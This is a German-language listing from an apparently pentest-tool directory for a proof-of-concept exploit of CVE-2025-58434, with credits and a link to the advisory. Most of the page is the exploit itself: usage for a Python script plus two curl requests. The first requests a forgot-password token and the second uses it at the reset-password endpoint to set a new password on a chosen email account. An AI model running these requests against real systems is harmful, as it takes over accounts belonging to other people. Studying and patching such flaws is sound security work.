Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/mananispiwpiw/cve-2025-58434-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubmananispiwpiw/cve-2025-58434-poc

CVE-2025-58434-PoC

CVE-2025-58434 Proof of Concept

Repository anzeigen
1vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-58434 PoC

Python Proof-of-Concept-Skript zum Auslösen von POST /api/v1/account/forgot-password.

⚠️ Nur für Bildungszwecke und autorisierte Sicherheitsforschung. Die Verwendung dieses Tools gegen Systeme, die Ihnen nicht gehören oder für deren Test Sie keine schriftliche Genehmigung haben, ist illegal.

Danksagung

  • zaddy6 (Isaac David)
  • arthurgervais (Arthur Gervais)

Details

  • PoC für CVE-2025-58434
  • Referenz: https://github.com/advisories/GHSA-wgpv-6j63-x5ph

Dateien

  • poc.py: fordert zur Eingabe von Maschinen-URL/IP, optionalem Protokoll bei bloßer Host/IP, Ziel-E-Mail und Passwort auf; sendet dann die Anfrage und gibt HTTP-Status, Header und Antworttext aus, ähnlich wie curl -i
Tool herunterladen

Verwendung

Ausführen:

root@kitploit:~
python3 poc.py

Danach angeben:

  • Maschinen-URL/IP, z. B. 10.10.11.10, http://10.10.11.10 oder https://target.example
  • Protokoll, wenn nach bloßer Host/IP gefragt wird
  • E-Mail-Adresse
  • Passwort

Äquivalenter curl

1. Anfrage

root@kitploit:~
curl -i -X POST https://<MACHINE_URL/IP>/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"<[email protected]>"}}'

2. Anfrage

root@kitploit:~
curl -i -X POST https://<target>/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -d '{
        "user":{
          "email":"<[email protected]>",
          "tempToken":"<tempToken>",
          "password":"NewSecurePassword123!"
        }
      }'